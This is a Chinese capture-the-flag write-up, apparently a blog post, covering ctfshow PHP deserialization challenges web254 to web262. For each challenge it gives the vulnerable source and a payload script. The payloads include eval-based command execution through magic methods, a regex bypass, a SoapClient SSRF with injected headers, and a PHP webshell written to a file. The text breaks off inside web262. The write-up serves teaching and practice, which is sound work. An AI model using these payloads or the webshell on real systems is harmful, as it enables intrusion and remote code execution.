{"id":227,"date":"2021-07-14T19:48:29","date_gmt":"2021-07-14T11:48:29","guid":{"rendered":"http:\/\/101.34.19.194\/?p=227"},"modified":"2021-07-14T19:55:29","modified_gmt":"2021-07-14T11:55:29","slug":"ctfshow-%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96","status":"publish","type":"post","link":"http:\/\/101.34.19.194\/?p=227","title":{"rendered":"ctfshow-\u53cd\u5e8f\u5217\u5316"},"content":{"rendered":"\n<p>\u77e5\u8bc6\u70b9\uff1a<a href=\"http:\/\/101.34.19.194\/?p=230\">php\u53cd\u5e8f\u5217\u5316 \u2013 \u9752\u5d50<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web254<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class ctfShowUser{<br> &nbsp; &nbsp;public $username='xxxxxx';<br> &nbsp; &nbsp;public $password='xxxxxx';<br> &nbsp; &nbsp;public $isVip=false;<br>\u200b<br> &nbsp; &nbsp;public function checkVip(){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;isVip;<br> &nbsp;  }<br> &nbsp; &nbsp;public function login($u,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;if($this-&gt;username===$u&amp;&amp;$this-&gt;password===$p){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;isVip=true;<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;isVip;<br> &nbsp;  }<br> &nbsp; &nbsp;public function vipOneKeyGetFlag(){<br> &nbsp; &nbsp; &nbsp; &nbsp;if($this-&gt;isVip){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;global $flag;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;echo \"your flag is \".$flag;<br> &nbsp; &nbsp; &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;echo \"no vip, no flag\";<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>\u200b<br>$username=$_GET&#91;'username'];<br>$password=$_GET&#91;'password'];<br>\u200b<br>if(isset($username) &amp;&amp; isset($password)){<br> &nbsp; &nbsp;$user = new ctfShowUser();<br> &nbsp; &nbsp;if($user-&gt;login($username,$password)){<br> &nbsp; &nbsp; &nbsp; &nbsp;if($user-&gt;checkVip()){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$user-&gt;vipOneKeyGetFlag();<br> &nbsp; &nbsp; 
&nbsp;  }<br> &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp; &nbsp;echo \"no vip,no flag\";<br> &nbsp;  }<br>}<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u4ee3\u7801\u5ba1\u8ba1\uff0c\u9996\u5148\u521d\u59cb\u5316ctfShowUser\u7c7b\uff0c\u5728\u7b2c\u4e8c\u5c42if\u5f53\u4e2d\u9996\u5148\u6267\u884clogin\u65b9\u6cd5\uff0c\u7528\u4e8e\u5224\u65ad\u6211\u4eecget\u4f20\u5165\u7684\u53c2\u6570username\u548cpassword\u662f\u5426\u4e0e\u7c7b\u4e2d\u4e00\u81f4\uff0c\u53d1\u73b0\u7528\u6237\u540d\u548c\u5bc6\u7801\u90fd\u662fxxxxxx\uff0c\u56e0\u6b64\u6211\u4eec\u53ea\u9700\u8981\u4f20\u5165username=xxxxxx&amp;password=xxxxxx\u5373\u53ef\u83b7\u53d6flag<\/p><\/blockquote>\n\n\n\n<h2 class=\"wp-block-heading\">web255<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>\u200b<br>error_reporting(0);<br>highlight_file(__FILE__);<br>include('flag.php');<br>\u200b<br>class ctfShowUser{<br> &nbsp; &nbsp;public $username='xxxxxx';<br> &nbsp; &nbsp;public $password='xxxxxx';<br> &nbsp; &nbsp;public $isVip=false;<br>\u200b<br> &nbsp; &nbsp;public function checkVip(){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;isVip;<br> &nbsp;  }<br> &nbsp; &nbsp;public function login($u,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;username===$u&amp;&amp;$this-&gt;password===$p;<br> &nbsp;  }<br> &nbsp; &nbsp;public function vipOneKeyGetFlag(){<br> &nbsp; &nbsp; &nbsp; &nbsp;if($this-&gt;isVip){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;global $flag;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;echo \"your flag is \".$flag;<br> &nbsp; &nbsp; &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;echo \"no vip, no flag\";<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>\u200b<br>$username=$_GET&#91;'username'];<br>$password=$_GET&#91;'password'];<br>\u200b<br>if(isset($username) &amp;&amp; isset($password)){<br> &nbsp; &nbsp;$user = unserialize($_COOKIE&#91;'user']); &nbsp; &nbsp;<br> &nbsp; &nbsp;if($user-&gt;login($username,$password)){<br> &nbsp; &nbsp; 
&nbsp; &nbsp;if($user-&gt;checkVip()){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$user-&gt;vipOneKeyGetFlag();<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp; &nbsp;echo \"no vip,no flag\";<br> &nbsp;  }<br>}<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u4ee3\u7801\u5ba1\u8ba1\uff0cif\u7b2c\u4e00\u5c42\u5224\u65ad\u662f\u5426\u4f20\u5165username\u548cpassword\u503c\uff0c\u4e14\u7c7b\u4e2d\u7684checkVip\u9700\u8981$this-&gt;isVip\u662ftrue\uff0c\u4e4b\u540e\u6267\u884cvipOneKeyGetFlag\u83b7\u53d6flag\u3002\u56e0\u6b64\u5728\u53cd\u5e8f\u5217\u5316\u65f6\u9700\u8981\u4fee\u6539false\u4e3atrue<\/p><p>\u5176\u6b21if\u7b2c\u4e8c\u5c42\u5224\u65ad\u4e2dlogin\u65b9\u6cd5\u5224\u65adusername\u548cpassword\u90fd\u4e3a\u6240\u58f0\u660e\u7684xxxxxx<\/p><\/blockquote>\n\n\n\n<p>\u636e\u6b64\u5199\u51fa\u53cd\u5e8f\u5217\u5316\u4ee3\u7801<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class ctfShowUser{<br> &nbsp; &nbsp;public $username='xxxxxx';<br> &nbsp; &nbsp;public $password='xxxxxx';<br> &nbsp; &nbsp;public $isVip=true;<br>}<br>\u200b<br>echo urlencode(serialize(new ctfShowUser()));<\/code><\/pre>\n\n\n\n<p>\u56e0\u4e3acookie\u5b57\u6bb5\u4e2d\u7684\u503c\u9700\u8981url\u7f16\u7801\uff0c\u6240\u4ee5\u5229\u7528urlencode\u8fdb\u884c\u7f16\u7801\uff0c\u5f97\u5230\u7ed3\u679c\u8fdb\u884c\u4fee\u6539cookie\uff0ccookie\u4e2d\u7684\u5b57\u6bb5\u540d\u4e3auser\uff0c\u5b57\u6bb5\u503c\u4e3a\u8fd0\u884cphp\u811a\u672c\u540e\u7684\u503c<\/p>\n\n\n\n<p>\u6700\u540e\u8fdb\u884cget\u4f20\u53c2\uff1a<code>username=xxxxxx&amp;password=xxxxxx<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web256<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>\u200b<br>error_reporting(0);<br>highlight_file(__FILE__);<br>include('flag.php');<br>\u200b<br>class ctfShowUser{<br> &nbsp; &nbsp;public $username='xxxxxx';<br> &nbsp; &nbsp;public $password='xxxxxx';<br> &nbsp; &nbsp;public $isVip=false;<br>\u200b<br> &nbsp; &nbsp;public 
function checkVip(){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;isVip;<br> &nbsp;  }<br> &nbsp; &nbsp;public function login($u,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;username===$u&amp;&amp;$this-&gt;password===$p;<br> &nbsp;  }<br> &nbsp; &nbsp;public function vipOneKeyGetFlag(){<br> &nbsp; &nbsp; &nbsp; &nbsp;if($this-&gt;isVip){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;global $flag;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if($this-&gt;username!==$this-&gt;password){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;echo \"your flag is \".$flag;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;echo \"no vip, no flag\";<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>\u200b<br>$username=$_GET&#91;'username'];<br>$password=$_GET&#91;'password'];<br>\u200b<br>if(isset($username) &amp;&amp; isset($password)){<br> &nbsp; &nbsp;$user = unserialize($_COOKIE&#91;'user']); &nbsp; &nbsp;<br> &nbsp; &nbsp;if($user-&gt;login($username,$password)){<br> &nbsp; &nbsp; &nbsp; &nbsp;if($user-&gt;checkVip()){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$user-&gt;vipOneKeyGetFlag();<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }else{<br> &nbsp; &nbsp; &nbsp; &nbsp;echo \"no vip,no flag\";<br> &nbsp;  }<br>}<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u5927\u81f4\u548c\u4e0a\u4e00\u9898\u76f8\u540c\uff0c\u591a\u4e86\u4e00\u4e2a\u5224\u65ad<\/p><p>if($this-&gt;username!==$this-&gt;password)<\/p><p>\u4e5f\u5c31\u662fusername\u548cpassword\u7684\u503c\u4e0d\u80fd\u76f8\u540c<\/p><p>\u90a3\u53ef\u4ee5\u53cd\u5e8f\u5217\u5316\u5bf9\u8fd9\u4e24\u4e2a\u53d8\u91cf\u8fdb\u884c\u4fee\u6539<\/p><\/blockquote>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class ctfShowUser{<br> &nbsp; &nbsp;public $username='a';<br> &nbsp; &nbsp;public $password='b';<br> &nbsp; &nbsp;public $isVip=true;<br>}<br>echo urlencode(serialize(new 
ctfShowUser()));<\/code><\/pre>\n\n\n\n<p>\u6700\u540eget\u5bf9username\u548cpassword\u4f20\u53c2\u9700\u8981\u4e0e\u53cd\u5e8f\u5217\u5316\u6240\u8bbe\u7f6e\u7684\u503c\u76f8\u540c<\/p>\n\n\n\n<p>payload\uff1a<code>?username=a&amp;password=b<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web257<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>\u200b<br>error_reporting(0);<br>highlight_file(__FILE__);<br>\u200b<br>class ctfShowUser{<br> &nbsp; &nbsp;private $username='xxxxxx';<br> &nbsp; &nbsp;private $password='xxxxxx';<br> &nbsp; &nbsp;private $isVip=false;<br> &nbsp; &nbsp;private $class = 'info';<br>\u200b<br> &nbsp; &nbsp;public function __construct(){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;class=new info();<br> &nbsp;  }<br> &nbsp; &nbsp;public function login($u,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;username===$u&amp;&amp;$this-&gt;password===$p;<br> &nbsp;  }<br> &nbsp; &nbsp;public function __destruct(){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;class-&gt;getInfo();<br> &nbsp;  }<br>\u200b<br>}<br>\u200b<br>class info{<br> &nbsp; &nbsp;private $user='xxxxxx';<br> &nbsp; &nbsp;public function getInfo(){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;user;<br> &nbsp;  }<br>}<br>\u200b<br>class backDoor{<br> &nbsp; &nbsp;private $code;<br> &nbsp; &nbsp;public function getInfo(){<br> &nbsp; &nbsp; &nbsp; &nbsp;eval($this-&gt;code);<br> &nbsp;  }<br>}<br>\u200b<br>$username=$_GET&#91;'username'];<br>$password=$_GET&#91;'password'];<br>\u200b<br>if(isset($username) &amp;&amp; isset($password)){<br> &nbsp; &nbsp;$user = unserialize($_COOKIE&#91;'user']);<br> &nbsp; &nbsp;$user-&gt;login($username,$password);<br>}<\/code><\/pre>\n\n\n\n<blockquote 
class=\"wp-block-quote\"><p><code>__construct<\/code>\u5f53\u5bf9\u8c61\u88ab\u521b\u5efa\u7684\u65f6\u5019\u81ea\u52a8\u8c03\u7528\uff0c\u5bf9\u5bf9\u8c61\u8fdb\u884c\u521d\u59cb\u5316\u3002\u5f53\u6240\u6709\u7684\u64cd\u4f5c\u6267\u884c\u5b8c\u6bd5\u4e4b\u540e\uff0c\u9700\u8981\u91ca\u653e\u53cd\u5e8f\u5217\u5316\u5f97\u5230\u7684\u5bf9\u8c61\uff0c\u89e6\u53d1<code>__destruct()<\/code>\u9b54\u672f\u65b9\u6cd5<\/p><p>\u4ee3\u7801\u4e2d\u53ef\u4ee5\u770b\u5230backDoor\u7c7b\u4e2d\u6709eval\u51fd\u6570\uff0c\u53ef\u4ee5\u5229\u7528eval\u51fd\u6570\u6267\u884c\u547d\u4ee4<\/p><\/blockquote>\n\n\n\n<p>\u56e0\u6b64\u6211\u4eec\u53ea\u9700\u8981\u5728\u6267\u884c<code>__construct<\/code>\u7684\u65f6\u5019\u521d\u59cb\u5316backDoor\u7c7b\uff0c\u65b9\u4fbf\u6211\u4eec\u8fdb\u884c\u547d\u4ee4\u6267\u884c\u7684\u5229\u7528\uff0c\u4e4b\u540e\u53cd\u5e8f\u5217\u5316\u7ed3\u675f\u540e\uff0c\u4f1a\u6267\u884c<code>__destruct()<\/code>,\u6b64\u65f6<code>eval($this-&gt;code);<\/code>\u7b49\u4ef7\u4e8e<code>eval(system('tac flag.php');)<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class ctfShowUser{<br> &nbsp; &nbsp;private $username='xxxxxx';<br> &nbsp; &nbsp;private $password='xxxxxx';<br> &nbsp; &nbsp;private $isVip=false;<br> &nbsp; &nbsp;private $class = 'backDoor';<br>\u200b<br> &nbsp; &nbsp;public function __construct(){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;class=new backDoor();<br> &nbsp;  }<br> &nbsp; &nbsp;public function __destruct(){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;class-&gt;getInfo();<br> &nbsp;  }<br>}<br>class backDoor{<br> &nbsp; &nbsp;private $code='system(\"tac flag.php\");';<br> &nbsp; &nbsp;public function getInfo(){<br> &nbsp; &nbsp; &nbsp; &nbsp;eval($this-&gt;code);<br> &nbsp;  }<br>}<br>echo urlencode(serialize(new ctfShowUser()));<\/code><\/pre>\n\n\n\n<p>\u6700\u540e\u901a\u8fc7get\u4f20\u53c2username\u548cpassword\u5373\u53ef<\/p>\n\n\n\n<h2 
class=\"wp-block-heading\">web258\u2014\u6b63\u5219\u5339\u914d\u7ed5\u8fc7<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>\u200b<br>error_reporting(0);<br>highlight_file(__FILE__);<br>\u200b<br>class ctfShowUser{<br> &nbsp; &nbsp;public $username='xxxxxx';<br> &nbsp; &nbsp;public $password='xxxxxx';<br> &nbsp; &nbsp;public $isVip=false;<br> &nbsp; &nbsp;public $class = 'info';<br>\u200b<br> &nbsp; &nbsp;public function __construct(){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;class=new info();<br> &nbsp;  }<br> &nbsp; &nbsp;public function login($u,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;username===$u&amp;&amp;$this-&gt;password===$p;<br> &nbsp;  }<br> &nbsp; &nbsp;public function __destruct(){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;class-&gt;getInfo();<br> &nbsp;  }<br>\u200b<br>}<br>\u200b<br>class info{<br> &nbsp; &nbsp;public $user='xxxxxx';<br> &nbsp; &nbsp;public function getInfo(){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;user;<br> &nbsp;  }<br>}<br>\u200b<br>class backDoor{<br> &nbsp; &nbsp;public $code;<br> &nbsp; &nbsp;public function getInfo(){<br> &nbsp; &nbsp; &nbsp; &nbsp;eval($this-&gt;code);<br> &nbsp;  }<br>}<br>\u200b<br>$username=$_GET&#91;'username'];<br>$password=$_GET&#91;'password'];<br>\u200b<br>if(isset($username) &amp;&amp; isset($password)){<br> &nbsp; &nbsp;if(!preg_match('\/&#91;oc]:\\d+:\/i', $_COOKIE&#91;'user'])){<br> &nbsp; &nbsp; &nbsp; &nbsp;$user = unserialize($_COOKIE&#91;'user']);<br> &nbsp;  }<br> &nbsp; &nbsp;$user-&gt;login($username,$password);<br>}<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u4ee3\u7801\u5ba1\u8ba1\uff0c\u9700\u8981\u7ed5\u8fc7preg_match(\u2019\/[oc]:\\d+:\/i\u2019, 
$var),\u4f7f\u7528+\uff08正则要求 O: 或 C: 后紧跟数字，而旧版 PHP 的 unserialize 容忍长度前多出的 +；较新的 PHP（一般认为 7.1 起）已不再接受这种写法，此绕过随之失效\uff09<\/p><\/blockquote>\n\n\n\n<p>\u4e0d\u8fdb\u884c\u7ed5\u8fc7\u65f6\uff0c\u5e8f\u5217\u5316\u540e\u8f93\u51fa\u7684\u662f<\/p>\n\n\n\n<p><code>O:11:\"ctfShowUser\":4:{s:8:\"username\";s:6:\"xxxxxx\";s:8:\"password\";s:6:\"xxxxxx\";s:5:\"isVip\";b:0;s:5:\"class\";O:8:\"backDoor\":1:{s:4:\"code\";s:23:\"system(\"tac flag.php\");\";}}<\/code><\/p>\n\n\n\n<p>\u7531\u4e8e\u6b63\u5219\u5339\u914d\u4f1a\u5339\u914d\u5f97\u5230\uff0c\u6240\u4ee5\u9700\u8981\u5c06<code>O:11<\/code>\u8fdb\u884c\u7ed5\u8fc7\uff0c\u66ff\u6362\u6210<code>O:+11<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class ctfShowUser{<br> &nbsp; &nbsp;public $username='xxxxxx';<br> &nbsp; &nbsp;public $password='xxxxxx';<br> &nbsp; &nbsp;public $isVip=false;<br> &nbsp; &nbsp;public $class = 'info';<br>\u200b<br> &nbsp; &nbsp;public function __construct(){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;class=new backDoor();<br> &nbsp;  }<br> &nbsp; &nbsp;public function login($u,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;return $this-&gt;username===$u&amp;&amp;$this-&gt;password===$p;<br> &nbsp;  }<br> &nbsp; &nbsp;public function __destruct(){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;class-&gt;getInfo();<br> &nbsp;  }<br>\u200b<br>}<br>class backDoor{<br> &nbsp; &nbsp;public $code = 'system(\"tac flag.php\");';<br> &nbsp; &nbsp;public function getInfo(){<br> &nbsp; &nbsp; &nbsp; &nbsp;eval($this-&gt;code);<br> &nbsp;  }<br>}<br>$a = serialize(new ctfShowUser());<br>$b = urlencode(str_replace('O:','O:+',$a));<br>echo $b;<\/code><\/pre>\n\n\n\n<p>\u5269\u4e0b\u7684\u505a\u6cd5\u548c\u4e0a\u9898\u4e00\u6837<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web259\u2014SoapClient<\/h2>\n\n\n\n<p>flag.php<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$xff = explode(',', $_SERVER&#91;'HTTP_X_FORWARDED_FOR']);<br>array_pop($xff);<br>$ip = array_pop($xff);<br>\u200b<br>\u200b<br>if($ip!=='127.0.0.1'){<br>    die('error');<br>}else{<br>    $token = $_POST&#91;'token'];<br>    
if($token=='ctfshow'){<br>        file_put_contents('flag.txt',$flag);<br>    }<br>}<\/code><\/pre>\n\n\n\n<p>\u8fd9\u4e2a\u9898\u5229\u7528\u7684\u662fphp\u539f\u751f\u7c7bSoapClient<\/p>\n\n\n\n<p>\u8be5\u7c7b\u7684\u6784\u9020\u51fd\u6570\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">public SoapClient :: SoapClient \uff08mixed $wsdl [\uff0carray $options ]\uff09<\/pre>\n\n\n\n<p>\u5e94\u8be5\u8fd8\u6709\u4e00\u6761\u5224\u65ad\u771f\u5b9eip\u7684\u4e5f\u5c31\u662f<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">if($_SERVER['REMOTE_ADDR']==='127.0.0.1'){<br>xxxxxx;<br>}<\/pre>\n\n\n\n<p>\u6240\u4ee5\u9996\u5148\u5f97\u5229\u7528ssrf\u8bbf\u95eeflag.php\u63a5\u7740\u6784\u9020post\u6570\u636e token=ctfshow\u548c\u8bf7\u6c42\u5934X-Forwarded-For \u5c31\u80fd\u628aflag\u5199\u5230flag.txt\u4e2d\u4e86\u3002<\/p>\n\n\n\n<p>payload<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>$ua = \"ctfshow\\r\\nX-Forwarded-For:127.0.0.1,127.0.0.1,127.0.0.1\\r\\nContent-Type:application\/x-www-form-urlencoded\\r\\nContent-Length:13\\r\\n\\r\\ntoken=ctfshow\";<br>\u200b<br>$client = new SoapClient(null,array('uri' =&gt; 'http:\/\/127,0.0.1\/','location' =&gt; 'http:\/\/127.0.0.1\/flag.php','user_agent' =&gt; $ua));<br>\u200b<br>echo urlencode(serialize($client));<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">web260<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>\u200b<br>error_reporting(0);<br>highlight_file(__FILE__);<br>include('flag.php');<br>\u200b<br>if(preg_match('\/ctfshow_i_love_36D\/',serialize($_GET&#91;'ctfshow']))){<br> &nbsp; &nbsp;echo $flag;<br>}<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u5c31\u53ea\u6709\u6b63\u5219\u5339\u914d\u5f97\u5230ctfshow_i_love_36D\u5c31\u53ef\u4ee5\u8f93\u51faflag\u4e86<\/p><\/blockquote>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class ctfshow{<br>    public $ctfshow=ctfshow_i_love_36D; <br>}<br>echo serialize(new 
ctfshow());<\/code><\/pre>\n\n\n\n<p>\u5e8f\u5217\u5316\u540e\u5f97\u5230\u7684\u503c\u901a\u8fc7get\u65b9\u5f0f\u4f20\u53c2\u7ed9ctfshow<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">web261<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>\u200b<br>highlight_file(__FILE__);<br>\u200b<br>class ctfshowvip{<br> &nbsp; &nbsp;public $username;<br> &nbsp; &nbsp;public $password;<br> &nbsp; &nbsp;public $code;<br>\u200b<br> &nbsp; &nbsp;public function __construct($u,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;username=$u;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;password=$p;<br> &nbsp;  }<br> &nbsp; &nbsp;public function __wakeup(){<br> &nbsp; &nbsp; &nbsp; &nbsp;if($this-&gt;username!='' || $this-&gt;password!=''){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;die('error');<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br> &nbsp; &nbsp;public function __invoke(){<br> &nbsp; &nbsp; &nbsp; &nbsp;eval($this-&gt;code);<br> &nbsp;  }<br>\u200b<br> &nbsp; &nbsp;public function __sleep(){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;username='';<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;password='';<br> &nbsp;  }<br> &nbsp; &nbsp;public function __unserialize($data){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;username=$data&#91;'username'];<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;password=$data&#91;'password'];<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;code = $this-&gt;username.$this-&gt;password;<br> &nbsp;  }<br> &nbsp; &nbsp;public function __destruct(){<br> &nbsp; &nbsp; &nbsp; &nbsp;if($this-&gt;code==0x36d){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;file_put_contents($this-&gt;username, $this-&gt;password);<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>}<br>\u200b<br>unserialize($_GET&#91;'vip']);<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u5982\u679c\u7c7b\u4e2d\u540c\u65f6\u5b9a\u4e49\u4e86 <strong>unserialize() \u548c <\/strong>wakeup() \u4e24\u4e2a\u9b54\u672f\u65b9\u6cd5\uff0c \u5219\u53ea\u6709 <strong>unserialize() 
\u65b9\u6cd5\u4f1a\u751f\u6548\uff0c<\/strong><code>__wakeup()<\/code> \u65b9\u6cd5\u4f1a\u88ab\u5ffd\u7565\u3002<\/p><\/blockquote>\n\n\n\n<p>\u5f53\u53cd\u5e8f\u5217\u5316\u65f6\u4f1a\u8fdb\u5165<code>__unserialize<\/code>\u4e2d\uff0c\u800c\u4e14\u4e5f\u6ca1\u6709\u4ec0\u4e48\u65b9\u6cd5\u53ef\u4ee5\u8fdb\u5165\u5230<code>__invoke<\/code>\u4e2d\u3002\u6240\u4ee5\u76f4\u63a5\u5c31\u671d\u7740\u5199\u6587\u4ef6\u641e\u5c31\u53ef\u4ee5\u4e86\u3002<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u53ea\u8981\u6ee1\u8db3code==0x36d(877)\u5c31\u53ef\u4ee5\u4e86\u3002 \u800ccode\u662fusername\u548cpassword\u62fc\u63a5\u51fa\u6765\u7684\u3002 \u6240\u4ee5\u53ea\u8981username=877.php password=shell\u5c31\u53ef\u4ee5\u4e86\u3002 877.php==877\u662f\u6210\u7acb\u7684\uff08\u5f31\u7c7b\u578b\u6bd4\u8f83\uff1bPHP 8 起整数与非数字字符串的比较规则已改变，此处不再成立\uff09<\/p><\/blockquote>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>class ctfshowvip{<br> &nbsp; &nbsp;public $username;<br> &nbsp; &nbsp;public $password;<br>\u200b<br> &nbsp; &nbsp;public function __construct($u,$p){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;username=$u;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;password=$p;<br> &nbsp;  }<br>}<br>$a=new ctfshowvip('877.php','&lt;?php eval($_POST&#91;1]);?&gt;');<br>echo serialize($a);<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">web262\u2014\u5b57\u7b26\u9003\u9038<\/h2>\n\n\n\n<p>\u9996\u9875\u6e90\u7801<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>\/*<br># -*- coding: utf-8 -*-<br># @Author: h1xa<br># @Date: &nbsp; 2020-12-03 02:37:19<br># @Last Modified by: &nbsp; h1xa<br># @Last Modified time: 2020-12-03 16:05:38<br># @message.php<br># @email: h1xa@ctfer.com<br># @link: https:\/\/ctfer.com<br>*\/<br>error_reporting(0);<br>class message{<br> &nbsp; &nbsp;public $from;<br> &nbsp; &nbsp;public $msg;<br> &nbsp; &nbsp;public $to;<br> &nbsp; &nbsp;public $token='user';<br> &nbsp; &nbsp;public function __construct($f,$m,$t){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;from = $f;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;msg = 
$m;<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;to = $t;<br> &nbsp;  }<br>}<br>\u200b<br>$f = $_GET&#91;'f'];<br>$m = $_GET&#91;'m'];<br>$t = $_GET&#91;'t'];<br>\u200b<br>if(isset($f) &amp;&amp; isset($m) &amp;&amp; isset($t)){<br> &nbsp; &nbsp;$msg = new message($f,$m,$t);<br> &nbsp; &nbsp;$umsg = str_replace('fuck', 'loveU', serialize($msg));<br> &nbsp; &nbsp;setcookie('msg',base64_encode($umsg));<br> &nbsp; &nbsp;echo 'Your message has been sent';<br>}<br>\u200b<br>highlight_file(__FILE__);<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u53ef\u4ee5\u770b\u5230\u6709\u5b57\u7b26\u66ff\u6362\uff0c<code>fuck<\/code>\u66ff\u6362\u6210<code>loveU<\/code>\uff0c\u5c5e\u4e8e\u5b57\u7b26\u53d8\u591a\uff0c\u6bcf\u6b21\u53d8\u591a\u4e00\u4e2a\u5b57\u7b26<\/p><p>\u5e8f\u5217\u5316\u540ebase64\u52a0\u5bc6\u8bbe\u7f6e\u6210cookie<\/p><p>\u63d0\u793a\u91cc\u6709message.php<\/p><\/blockquote>\n\n\n\n<p>message.php<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php<br>highlight_file(__FILE__);<br>include('flag.php');<br>\u200b<br>class message{<br> &nbsp; &nbsp;public $from;<br> &nbsp; &nbsp;public $msg;<br> &nbsp; &nbsp;public $to;<br> &nbsp; &nbsp;public $token='user';<br> &nbsp; &nbsp;public function __construct($f,$m,$t){<br> &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;from = $f;<br> &nbsp; &nbsp; &nbsp; 